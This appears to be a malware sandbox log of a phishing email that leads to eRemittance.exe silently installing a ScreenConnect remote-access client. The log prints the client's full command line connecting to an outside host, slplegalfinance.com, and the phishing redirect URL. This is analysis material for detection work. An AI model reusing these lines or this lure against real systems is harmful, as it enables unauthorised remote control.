                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}\DefaultIcon
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.SchedServiceConfig.rmi
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\33xjpkwm.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\33xjpkwm.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\kg0yg1f5.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\kg0yg1f5.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\43c40lnf.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\43c40lnf.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\txen3epo.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\txen3epo.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\oz1n5u5s.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\oz1n5u5s.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\fgz2mhtp.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\fgz2mhtp.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\gmfovyxq.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\gmfovyxq.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\yaccxh23.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\yaccxh23.newcfg
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\di3gogkl.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\di3gogkl.newcfg
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIE23F.tmp
                      Source: classification engineClassification label: mal84.evad.winEML@45/54@14/141
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7916:120:WilError_03
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250117T1245400379-7096.etl
                      Source: C:\Users\user\Downloads\eRemittance.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Downloads\eRemittance.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID83C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4839593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml"
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D1E851C1-780A-4AD8-8E17-7E00F8FC2E73" "7773720D-9100-489C-95B7-23FC0504D7F1" "7096" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=5f30d80bfc49ccfd2ec3457f652892e61ef725c0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D1E851C1-780A-4AD8-8E17-7E00F8FC2E73" "7773720D-9100-489C-95B7-23FC0504D7F1" "7096" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5364 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\eRemittance.exe "C:\Users\user\Downloads\eRemittance.exe"
                      Source: C:\Users\user\Downloads\eRemittance.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6059364A692FB498A42B140D258E2948 C
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID83C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4839593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=5f30d80bfc49ccfd2ec3457f652892e61ef725c0
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D2104C54B219E825B1B95ED4C489F475
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5364 --field-trial-handle=2064,i,3225509582482086580,13909682747020890932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F0AA89784B24B42B9C239E4001478082 E Global\MSI0000
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv&c=&c=UPDATE&c=&c=&c=&c=&c=&c="
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d04c094f-179d-486a-be2c-17bfa71a0d2c" "User"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\eRemittance.exe "C:\Users\user\Downloads\eRemittance.exe"
                      Source: C:\Users\user\Downloads\eRemittance.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6059364A692FB498A42B140D258E2948 C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D2104C54B219E825B1B95ED4C489F475
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F0AA89784B24B42B9C239E4001478082 E Global\MSI0000
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID83C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4839593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "d04c094f-179d-486a-be2c-17bfa71a0d2c" "User"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: amsi.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: version.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: slc.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Downloads\eRemittance.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
